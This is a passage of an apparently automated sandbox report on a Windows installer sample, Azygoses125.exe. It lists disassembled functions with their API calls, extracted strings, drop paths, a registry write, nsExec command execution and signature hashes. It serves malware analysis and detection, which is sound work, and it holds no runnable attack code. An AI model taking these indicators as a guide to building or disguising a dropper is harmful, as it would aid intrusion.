Function 004064C6 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(771B3420,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0), ref: 004064D1
FindClose.KERNEL32(00000000), ref: 004064DD

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
Instruction ID: 6f39d47423a9e3911ec825e8889a8cd4e4dbe9a09c05077791626206cca478a1
Opcode Fuzzy Hash: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
Instruction Fuzzy Hash: FED012715151209BC2901B787F0C85B7A989F553317128E36F46AF22E0C738CC67869C

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
Instruction ID: f51a3655aa6281515c31db2bfa725e220f35cee11171475ca2a169fd8dd427bf
Opcode Fuzzy Hash: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
Instruction Fuzzy Hash: 09F05E716001149BC711EBA4DE49AAEB374EF04324F10057BE515E31E1D6B499459B2A

Function 00403D6F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DAB
ShowWindow.USER32(?), ref: 00403DC8
DestroyWindow.USER32 ref: 00403DDC
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF8
GetDlgItem.USER32(?,?), ref: 00403E19
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E2D
IsWindowEnabled.USER32(00000000), ref: 00403E34
GetDlgItem.USER32(?,00000001), ref: 00403EE2
GetDlgItem.USER32(?,00000002), ref: 00403EEC
SetClassLongW.USER32(?,000000F2,?), ref: 00403F06
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F57
GetDlgItem.USER32(?,00000003), ref: 00403FFD
ShowWindow.USER32(00000000,?), ref: 0040401E
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404030
EnableWindow.USER32(?,?), ref: 0040404B
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404061
EnableMenuItem.USER32(00000000), ref: 00404068
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404080
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404093
lstrlenW.KERNEL32(00423748,?,00423748,00429260), ref: 004040BC
SetWindowTextW.USER32(?,00423748), ref: 004040D0
ShowWindow.USER32(?,0000000A), ref: 00404204

Strings

H7B, xrefs: 004040A8

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: H7B
API String ID: 3282139019-2300413410
Opcode ID: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
Instruction ID: 25c141fc174ea51021f963d75397c5770897fb54822066ed0df1b6b59a0401a8
Opcode Fuzzy Hash: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
Instruction Fuzzy Hash: EFC1CFB1644200FBDB216F61EE84D2B7B78EB98745F40097EF641B51F0CB3998529B2E

Function 004039CC Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586

lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Azygoses125.exe"), ref: 00403A4D
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,771B3420), ref: 00403ACD
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403AE0
GetFileAttributesW.KERNEL32(: Completed), ref: 00403AEB
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\magmaet\clenched), ref: 00403B34

Part of subcall function 004060CA: wsprintfW.USER32 ref: 004060D7

RegisterClassW.USER32(00429200), ref: 00403B71
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B89
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BBE
ShowWindow.USER32(00000005,00000000), ref: 00403BF4
GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403C20
GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403C2D
RegisterClassW.USER32(00429200), ref: 00403C36
DialogBoxParamW.USER32(?,00000000,00403D6F,00000000), ref: 00403C55

Strings

RichEdit20W, xrefs: 00403C18, 00403C1E
.DEFAULT\Control Panel\International, xrefs: 00403A38
RichEd32, xrefs: 00403C08
.exe, xrefs: 00403ADA
RichEdit, xrefs: 00403C27
"C:\Users\user\Desktop\Azygoses125.exe", xrefs: 004039CF
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00403A5C, 00403A64, 00403B07, 00403B0D, 00403B1D
_Nb, xrefs: 00403B50, 00403BB8
Control Panel\Desktop\ResourceLocale, xrefs: 00403A00
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004039D1
: Completed, xrefs: 00403A94, 00403A9D, 00403AAB, 00403AFA, 00403B00
RichEd20, xrefs: 00403BFA
1033, xrefs: 004039EC, 00403A48
H7B, xrefs: 004039F8

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Azygoses125.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-428392048
Opcode ID: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
Instruction ID: 56c0b88d72ef28cc24ab3b3da6b812fbe5e4610ed82a7e8ff487d4c0aa16eca4
Opcode Fuzzy Hash: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
Instruction Fuzzy Hash: E261C270240600BAD720AF66AD45F2B3A7CEB84B09F40447EF945B22E2DB7D69118A3D

Function 00402E41 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402E55
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Azygoses125.exe,00000400), ref: 00402E71

Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\Azygoses125.exe,80000000,00000003), ref: 00405D5C
Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Azygoses125.exe,C:\Users\user\Desktop\Azygoses125.exe,80000000,00000003), ref: 00402EBA
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403001

Strings

Null, xrefs: 00402F3A
"C:\Users\user\Desktop\Azygoses125.exe", xrefs: 00402E4A
Error launching installer, xrefs: 00402E91
C:\Users\user\Desktop\Azygoses125.exe, xrefs: 00402E5B, 00402E6A, 00402E7E, 00402E9B
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040304A
soft, xrefs: 00402F31
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402E4B, 00403019
Inst, xrefs: 00402F28
C:\Users\user\Desktop, xrefs: 00402E9C, 00402EA1, 00402EA7
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403098

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Azygoses125.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Azygoses125.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-857514478
Opcode ID: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
Instruction ID: 78d4ac72044dd1d4b64dcf5cb9e774c3474f7f20f7d9c099438d2fbc404b67ba
Opcode Fuzzy Hash: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
Instruction Fuzzy Hash: 6961E231900215AFDB209F75DD49B9E7AB8AB04359F20817FFA00B62C1CBB99A458B5D

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched,?,?,00000031), ref: 004017CD

Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

Strings

C:\Users\user~1\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll, xrefs: 0040182D, 00401849
ExecToStack, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE
artikulationer\Udsorteringerne, xrefs: 00401819, 00401837
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00401796

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user~1\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll$C:\Users\user\AppData\Local\magmaet\clenched$ExecToStack$artikulationer\Udsorteringerne
API String ID: 1941528284-3847348403
Opcode ID: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
Instruction ID: 6fe11ac43b73c0a2a9a7664c997375d2890861868a1009608a3dd96d2534e176
Opcode Fuzzy Hash: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
Instruction Fuzzy Hash: B141B531900515BFCF10BBB5CC46DAE7679EF05328B20823BF422B51E1DB3C86529A6E

Function 004052E2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

Strings

Completed, xrefs: 00405303, 00405313, 00405319, 0040533C, 00405348

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
Instruction ID: 5ed309c8d3f1bf46da027166848d039c97de4a2eecd53fde705ce25c05ecf2d8
Opcode Fuzzy Hash: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
Instruction Fuzzy Hash: 4A21B075900618BBCB119FA5DD44ACFBFB8EF84390F10803AF904B62A0C7B94A51DF68

Function 004057B1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\), ref: 004057F4
GetLastError.KERNEL32 ref: 00405808
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040581D
GetLastError.KERNEL32 ref: 00405827

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004057D8
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004057D7

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user~1\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 3449924974-875112913
Opcode ID: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
Instruction ID: 9d8b3aa145bda6eaeb46bbd44b0caf250caa68881350f4f3315e0aaa1c0c1a31
Opcode Fuzzy Hash: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
Instruction Fuzzy Hash: 400108B1D00619EADF10DBA0D9087EFBFB8EF04314F00803AD945B6190D77996588FA9

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(artikulationer\Udsorteringerne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.ADVAPI32(?,?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

artikulationer\Udsorteringerne, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: artikulationer\Udsorteringerne
API String ID: 1356686001-2681483848
Opcode ID: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
Instruction ID: 75ab489ca3c386883e02df54fe3069bb457763bdb47647990c5a7a2e11d383c6
Opcode Fuzzy Hash: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
Instruction Fuzzy Hash: B8118E71A00108BFEB10AFA5DE89EAE777DEB44358F11403AF904B71D1D6B85E409668

Function 00406698 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

teProcessW, xrefs: 00406698

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
